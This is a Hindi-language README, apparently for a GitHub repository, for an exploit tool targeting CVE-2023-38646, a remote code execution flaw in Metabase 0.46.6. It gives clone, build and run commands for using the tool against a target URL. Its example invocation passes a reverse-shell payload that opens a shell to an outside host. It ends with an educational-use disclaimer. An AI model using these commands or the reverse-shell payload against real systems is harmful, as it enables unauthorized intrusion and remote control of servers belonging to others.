
CVE-2023-38646 के लिए Metabase 0.46.6 में शोषण, जो क्राफ्टेड अनुरोधों और सेटअप टोकन पुनर्प्राप्ति के माध्यम से रिमोट कोड निष्पादन को सक्षम करता है।
CVE-2023-38646 Metabase 0.46.6 शोषण
यह टूल एक सॉफ्टवेयर प्लेटफ़ॉर्म में कमज़ोरी (CVE-2023-38646) का शोषण करता है। यह शोषण एक क्राफ्टेड अनुरोध के माध्यम से रिमोट कोड निष्पादन की अनुमति देता है, जो गलत तरीके से संभाले गए डेटाबेस कनेक्शन स्ट्रिंग का लाभ उठाता है।
यह टूल:
रिपॉजिटरी को क्लोन करें:
git clone https://github.com/SUT0L/CVE-2023-38646.git
cd CVE-2023-38646
go build -o exploit
chmod +x exploit
./exploit --url [TARGET_URL] --command [COMMAND] [--proxy PROXY_URL]
TARGET_URL: स्कैन और शोषण किए जाने वाले प्लेटफ़ॉर्म का URL। COMMAND: लक्ष्य पर निष्पादित किया जाने वाला कमांड। PROXY_URL (वैकल्पिक): प्रॉक्सी सर्वर का URL (जैसे, http://127.0.0.1:8080)। यदि प्रदान नहीं किया गया है, तो कोई प्रॉक्सी उपयोग नहीं किया जाएगा।
./exploit --url https://example.com --command 'sh -i >& /dev/tcp/10.0.0.1/4444 0>&1' --proxy http://127.0.0.1:8080
यह टूल केवल शैक्षिक और शोध उद्देश्यों के लिए है। किसी भी लक्ष्य को स्कैन या शोषण करने से पहले हमेशा सुनिश्चित करें कि आपके पास उचित प्राधिकरण है। इस टूल का दुरुपयोग डेवलपर के इरादे के सख्त खिलाफ है और अवैध हो सकता है।
किसी भी प्रतिक्रिया, बग, या सुविधा अनुरोध के लिए बेझिझक issues खोलें। पुल अनुरोध हमेशा स्वागत योग्य हैं!